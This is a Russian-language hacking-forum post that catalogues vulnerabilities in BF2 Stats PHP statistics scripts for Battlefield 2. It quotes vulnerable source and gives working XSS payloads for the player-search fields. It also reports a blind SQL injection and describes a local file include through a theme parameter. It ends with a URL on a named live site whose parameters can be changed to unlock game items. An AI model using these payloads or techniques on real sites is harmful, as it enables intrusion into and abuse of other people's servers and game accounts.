BF2 Stat Clone Скачать: http://upload.com.ua/get/901846173/ Blind SQL Injection: Result: [Пример одного сайта] Query failed: Duplicate entry '5.0.37-standard-log1' for key 1 + XSS в Поиске. BF2 Stat 1.4.2 XSS search.php PHP: if( $_GET['search_pid'] ) { echo '<h1>Find Player: "' . $_GET['search_pid'] . '"</h1>'; $players = $stats->findPlayer($_GET['search_pid'], $_GET['searchAt']); if( $players ) { echo "<ol>"; foreach( $players as $r ) echo "<li><a href=\"player.php?pid=$r[pid]\">$r[nick]</a></li>"; echo "</ol>"; echo "Not finding your nick? Try to get more specific.<br>The BF2 stat servers only return 100 matches in a set.<br>Also, players with a score of 0 are exlcuded."; .... Вписываем, Найти Игрока По ID: "><script>alert(010010010)</script> Result: [Пример одного сайта] Brainpecker's BF2 Stats v2.12 Autor Website: http://www.brainpecker.com/ Раскрытие Пути: XSS [Раскрытие пути тоже видны]: В Поле "Nick or PID 1": <script>alert('xss')</script> bf2_stats_tables.php PHP: function additionalSearchResults($search_result, $nick) { if(count($search_result>0)) { // format output $j=0; $max = count($search_result); for($i=0; $i<$max; $i++) { if($search_result[$i]["nick"]!=$nick) { $clean[$j] = "<a href='".$_SERVER['SCRIPT_NAME']."?input1=".trim($search_result[$i]["pid"])."'>".$search_result[$i]["nick"]."</a>"; $j++; } } .... Result: (c)feldmarschall зы, сорри если что-то ступил(
Проверять на скули не стал, ибо табл нету, и там каждый файл уязвим. А так читалки файлов ещё куча. Local File Include Need: rg=on. mq=off Сохраняем картинку, открываем в блокноте, вуаля HTML код выполненного файла. /sig/sig.php PHP: if (!file_exists($cachefilename)) { $error = "BF2Web Down and no cache file exists."; $mode = error; include("themes/".$theme."/theme.php"); exit; }
Открытие анлоков. http://bf2.u-l.ru/ASP/selectunlock.aspx?pid=252758212&id=99 Где pid - собственно плеер ид, id - идшник анлока. Идшники анлоков можно взять тут.
